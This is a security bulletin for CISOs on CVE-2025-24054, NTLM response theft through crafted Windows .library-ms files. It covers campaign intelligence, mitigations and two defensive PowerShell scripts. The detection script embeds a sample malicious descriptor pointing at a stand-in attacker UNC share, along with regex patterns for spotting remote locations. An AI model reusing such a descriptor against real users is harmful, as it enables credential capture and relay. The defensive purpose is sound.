April Cloaked in Security


CISO Monthly: NTLM Hash Theft Under Active Exploitation

Issue: April 2026

Recent intelligence from Check Point Research confirms that CVE-2025-24054, an NTLM hash disclosure spoofing vulnerability in Windows, is being actively weaponized. Microsoft's advisory rated it "Exploitation Less Likely" when the fix shipped in the March 2025 security update, yet more than ten distinct campaigns have been observed since March 2025 against government and private institutions, the first of them within about a week of the patch.

Threat Profile: CVE-2025-24054

This vulnerability lets an unauthenticated remote attacker obtain a victim's NTLMv2 challenge-response (Net-NTLMv2, sometimes written NTLMv2-SSP) without the victim opening or executing the malicious file. The leaked value is not the stored NT hash: it cannot be replayed directly in a pass-the-hash attack, but it can be cracked offline to recover the password, or relayed in real time to services that do not enforce signing or channel binding.

  • The Trigger Mechanism: The attack uses specially crafted .library-ms files, the XML descriptors behind Windows Libraries (the virtual folders such as Documents that aggregate several locations). A descriptor lists the locations a library spans; the malicious files point one of those locations at an attacker-controlled UNC share.

  • Minimal Interaction Required: Exploitation is triggered by selecting the file (single click), inspecting it (right-click), or simply viewing the folder that contains it in Windows Explorer, which includes the moment Explorer displays the contents of a freshly extracted archive. No double-click is needed.

  • The Process: As soon as Windows Explorer (or the search indexer, SearchProtocolHost.exe) parses the descriptor, it resolves the remote UNC path inside it (e.g., \\attacker-IP\share). That resolution opens an SMB session to the attacker's server, the server issues an NTLM challenge, and the client answers with the logged-on user's Net-NTLMv2 response, which the attacker records.

  • Historical Variant: This flaw is a variant of CVE-2024-43451, patched in November 2024 after it was exploited as a zero-day against Ukrainian entities.
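The descriptor format above is simple enough to hunt for directly. The following is an added example, not code from Check Point Research or from this bulletin: it parses .library-ms XML, extracts every declared location, and flags any that resolve to a remote host (UNC path or URL). The sample descriptor is constructed for the demo, the host 192.0.2.10 is a documentation-only address rather than an observed indicator, and the function names are this example's own.

```powershell
# Added example, not code from Check Point Research or this bulletin.
# Parses .library-ms descriptors and flags any that declare a remote location
# (UNC share or URL), the property the malicious files depend on.
# The sample below is constructed; 192.0.2.10 is a documentation-only address.

function Get-LibraryMsLocation {
    # Returns every <url> declared in a library descriptor, given its raw XML text.
    param([Parameter(Mandatory)][string]$Xml)
    try {
        $doc = [xml]$Xml
    } catch {
        Write-Warning "Not well-formed XML: $($_.Exception.Message)"
        return
    }
    # GetElementsByTagName matches the element name regardless of the default namespace.
    foreach ($node in $doc.GetElementsByTagName('url')) {
        $node.InnerText.Trim()
    }
}

function Test-RemoteLocation {
    # True for \\host\share, \\?\UNC\host\share, or any scheme://host form
    # (file://, smb://, or http(s):// for the WebDAV fallback). A bare drive path
    # such as C:\Users\... is local and returns false.
    param([Parameter(Mandatory)][string]$Location)
    return [bool]($Location -match '^\\\\' -or $Location -match '^[A-Za-z][A-Za-z0-9+.-]*://')
}

function Find-SuspiciousLibraryMs {
    # Walks a folder tree (a mail quarantine, a user's Downloads) and reports every
    # .library-ms whose locations include a remote target. Reading the file with
    # Get-Content does not invoke the shell handler; browsing the folder in Explorer
    # would, so run this from a console, never from a file browser.
    param([Parameter(Mandatory)][string]$Root)
    Get-ChildItem -LiteralPath $Root -Recurse -File -Filter '*.library-ms' -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            $xml = Get-Content -LiteralPath $file.FullName -Raw -ErrorAction SilentlyContinue
            if (-not $xml) { return }
            foreach ($loc in Get-LibraryMsLocation -Xml $xml) {
                if (Test-RemoteLocation -Location $loc) {
                    [pscustomobject]@{
                        File     = $file.FullName
                        Location = $loc
                        Created  = $file.CreationTimeUtc
                    }
                }
            }
        }
}

# Demo on a constructed sample held in memory. It is parsed as a string rather than
# written to disk so that no folder on this machine ever contains a live descriptor.
$sample = @'
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>Documents</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <simpleLocation>
        <url>\\192.0.2.10\shared</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
'@

Get-LibraryMsLocation -Xml $sample |
    ForEach-Object { [pscustomobject]@{ Location = $_; Remote = (Test-RemoteLocation -Location $_) } }

# Live hunt over a real folder tree:
# Find-SuspiciousLibraryMs -Root "$env:USERPROFILE\Downloads"
```

The same functions can sit behind a mail-gateway hook or an EDR custom script: any .library-ms whose locations are not local drive paths or known folder references is worth quarantining, since a legitimate library shipped by e-mail is vanishingly rare.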

Campaign Intelligence

Targeted attacks were first identified in mid-March 2025 against entities in Poland and Romania.

  • Delivery: Phishing emails carried Dropbox links to a ZIP archive holding the malicious .library-ms file; extracting the archive was enough for Explorer to process the descriptor and leak the Net-NTLMv2 response.

  • Attribution: One malicious SMB server used in the campaign has previously been linked to APT28 (Fancy Bear/Forest Blizzard). The overlap is an indicator, not a confirmed attribution.

  • Global Reach: Later campaigns in March 2025 targeted enterprise users worldwide with the descriptor delivered uncompressed as "Info.doc.library-ms", a double extension intended to pass as a Word document.



Sector-Specific Risk Assessment

Each entry below gives the sector, the observed risk, and the recommended action.

NFP, Government & Consulting

  • Observed Risk: High criticality. Primary targets of the current APT-led hash harvesting campaigns.

  • Recommended Action: Prioritize patching of all workstations and block or quarantine .library-ms attachments at the mail gateway, including inside ZIP archives.

Financial Services

  • Observed Risk: Elevated. A captured Net-NTLMv2 response can be relayed for unauthorized lateral movement in high-value environments.

  • Recommended Action: Require SMB signing on clients and servers, and enable Extended Protection for Authentication and LDAP channel binding, so a relayed response cannot be used against internal services.

Technology & Software

  • Observed Risk: Targeted. Active campaigns deliver malicious library files directly via social engineering.

  • Recommended Action: Block outbound SMB (TCP 445) to the internet at the perimeter so a captured response never reaches the attacker's server.

Manufacturing & Energy

  • Observed Risk: Vulnerable. Legacy systems in these sectors often still rely on NTLMv2 for internal authentication.

  • Recommended Action: Audit NTLM usage (NTLM auditing policies and the Microsoft-Windows-NTLM/Operational event log) and move toward Kerberos-only authentication where possible.

Biotech & Healthcare

  • Observed Risk: Critical. High risk of lateral movement if a privileged user's response is captured and cracked or relayed.

  • Recommended Action: Alert on explorer.exe or SearchProtocolHost.exe initiating outbound connections on TCP 445 to unfamiliar or external hosts.


Immediate CISO Mitigation Strategy

  1. Mandatory Patching: Apply the March 2025 Windows security updates (or later) immediately to all supported Windows and Windows Server versions; the fix has been available since the vulnerability was disclosed.

  2. Micropatching: For unsupported legacy systems (e.g., Windows 7, Server 2008 R2) that cannot be retired yet, use a micropatching solution to close the flaw until the host is decommissioned.

  3. Firewall Hardening: Block all outbound SMB traffic (TCP 445, and legacy NetBIOS session traffic on TCP 139) to the internet so leaked responses cannot reach the attacker's server. Note the caveat: if the WebClient service is running, a failed SMB connection to a UNC path can fall back to WebDAV over 80/443 and leak NTLM that way, so disable WebClient where it is not needed.

  4. Restrict Outgoing NTLM: Set the policy "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" to Audit all, review the resulting 8001 events in the Microsoft-Windows-NTLM/Operational log, then move to Deny all with exceptions for known internal servers. This stops the leak at the host even when a UNC path is resolved.

  5. Endpoint Monitoring: Alert on explorer.exe or SearchProtocolHost.exe opening outbound SMB connections to external hosts, and on the creation of .library-ms files in user-writable locations such as Downloads, Temp, and mail attachment caches.
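The controls above, applied to a single host and followed by a read of the NTLM audit trail, as an added example that is not configuration from this bulletin or from Microsoft's advisory. It assumes an elevated PowerShell session on a Windows client or server; the function names are this example's own, the "Internet" address keyword and the LSA registry values are standard Windows settings, and the regex that pulls the target host out of event 8001 assumes the English event template. Running the script changes firewall, service, SMB and LSA settings on the machine it runs on.

```powershell
# Added example, not configuration from the bulletin or from Microsoft's advisory.
# Applies the host-side controls discussed above and reads the NTLM audit log.
# Requires an elevated PowerShell; every function here changes local settings.

function Block-OutboundSmbToInternet {
    # Outbound SMB (TCP 445 plus legacy NetBIOS session 139) to non-intranet
    # addresses. "Internet" is the firewall's built-in keyword for addresses
    # outside the Network Isolation intranet ranges.
    New-NetFirewallRule -DisplayName 'Block outbound SMB to Internet' `
        -Direction Outbound -Protocol TCP -RemotePort 445, 139 `
        -RemoteAddress Internet -Action Block -Profile Any | Out-Null
}

function Disable-WebDavFallback {
    # With SMB blocked, a UNC lookup can fall back to WebDAV over 80/443 when the
    # WebClient service is running, and NTLM leaks that way instead.
    Stop-Service -Name WebClient -Force -ErrorAction SilentlyContinue
    Set-Service -Name WebClient -StartupType Disabled -ErrorAction SilentlyContinue
}

function Enable-SmbSigningRequirement {
    # Mandatory signing on both sides defeats relay of a captured Net-NTLMv2
    # response to SMB services; it does nothing against offline cracking.
    Set-SmbClientConfiguration -RequireSecuritySignature $true -Force
    Set-SmbServerConfiguration -RequireSecuritySignature $true -Force
}

function Set-OutgoingNtlmRestriction {
    # Mirrors "Network security: Restrict NTLM: Outgoing NTLM traffic to remote
    # servers": 0 = allow all, 1 = audit all, 2 = deny all.
    # Start with Audit, review event 8001, then move to Deny with exceptions.
    param(
        [Parameter(Mandatory)][ValidateSet('Allow', 'Audit', 'Deny')][string]$Mode,
        [string[]]$AllowedServers = @()   # exceptions, e.g. a legacy NAS hostname
    )
    $key   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0'
    $value = @{ Allow = 0; Audit = 1; Deny = 2 }[$Mode]
    Set-ItemProperty -Path $key -Name RestrictSendingNTLMTraffic -Value $value -Type DWord
    if ($AllowedServers.Count -gt 0) {
        Set-ItemProperty -Path $key -Name ClientAllowedNTLMServers -Value $AllowedServers -Type MultiString
    }
}

function Get-OutgoingNtlmAuditEvent {
    # Event 8001 in Microsoft-Windows-NTLM/Operational records each outgoing NTLM
    # authentication to a remote server once the policy above is Audit or Deny.
    # Target and process are parsed from the message text; the regexes assume the
    # English event template.
    param([int]$Hours = 24)
    Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-NTLM/Operational'
        Id        = 8001
        StartTime = (Get-Date).AddHours(-$Hours)
    } -ErrorAction SilentlyContinue | ForEach-Object {
        $target = if ($_.Message -match 'Target server:\s*(\S+)') { $Matches[1] } else { '?' }
        $proc   = if ($_.Message -match 'Name of client process:\s*(.+?)\r?\n') { $Matches[1] } else { '?' }
        [pscustomobject]@{ Time = $_.TimeCreated; Target = $target; Process = $proc }
    }
}

# Order matters: audit first, so legacy dependencies surface before anything breaks.
Set-OutgoingNtlmRestriction -Mode Audit
Block-OutboundSmbToInternet
Disable-WebDavFallback
Enable-SmbSigningRequirement

# Which remote servers is this host still authenticating to with NTLM, and from
# which process? A bare IP address reached by explorer.exe is the pattern to chase.
Get-OutgoingNtlmAuditEvent -Hours 24 |
    Group-Object Target, Process |
    Sort-Object Count -Descending |
    Select-Object Count, Name |
    Format-Table -AutoSize
```

For a fleet, the same settings belong in Group Policy rather than per-host scripts: the NTLM restriction lives under Security Options, the firewall rule under Windows Defender Firewall with Advanced Security, and SMB signing under the Microsoft network client/server security options. Only switch the NTLM policy to Deny once the audit output shows nothing you still need, and list what remains under the remote server exceptions.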